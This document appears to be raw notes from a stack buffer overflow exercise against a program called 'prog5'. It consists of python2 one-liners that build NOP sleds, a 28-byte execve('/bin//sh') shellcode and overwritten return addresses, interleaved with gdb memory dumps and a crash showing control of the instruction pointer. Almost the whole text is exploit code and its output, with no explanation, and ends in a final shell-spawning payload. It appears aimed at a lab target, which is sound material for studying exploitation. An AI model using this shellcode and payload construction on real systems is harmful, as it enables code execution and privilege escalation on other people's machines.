prog5 $(python2 -c 'print "\x90"*758')

prog5 $(python2 -c 'print "\x90"*508')

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x60\x4b\xff\xff
length: 28


prog5 $(python2 -c 'print "\x90"*726 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x60\x4b\xff\xff"')


----------757 A's------------------

0xffffd540:	0x00000000	0x00000000	0x2a000000	0xf11721f8
0xffffd550:	0xb469bfff	0xbab23e5f	0x69e3021e	0x00363836
0xffffd560:	0x00000000	0x00000000	0x752f0000	0x6c2f7273
0xffffd570:	0x6c61636f	0x6e69622f	0x6f72702f	0x41003567
0xffffd580:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd590:	0x41414141	0x41414141	0x41414141	0x41414141

----------758 A's----------------------------------------------------------

0xffffd540:	0x00000000	0x00000000	0xa7000000	0xaff960d5
0xffffd550:	0xbae15518	0x8bb0f275	0x694c86ed	0x00363836
0xffffd560:	0x00000000	0x00000000	0x73752f00	0x6f6c2f72
0xffffd570:	0x2f6c6163	0x2f6e6962	0x676f7270	0x41410035
0xffffd580:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd590:	0x41414141	0x41414141	0x41414141	0x41414141

-----------------------------------------------------

run $(python2 -c 'print "A"*512 + "C"*4')

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()

0xffffd830:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd840:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd850:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd860:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd870:	0x43434343	0x00000000	0x00000000	0x00000000
0xffffd880:	0x00000000	0x00000000	0x00000000	0x00000000

x/300x $esp
------------------------------------------------------

0xffffd7a0:

run $(python2 -c 'print "\x90"*484 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+ "\xa0\xd7\xff\xff"')






























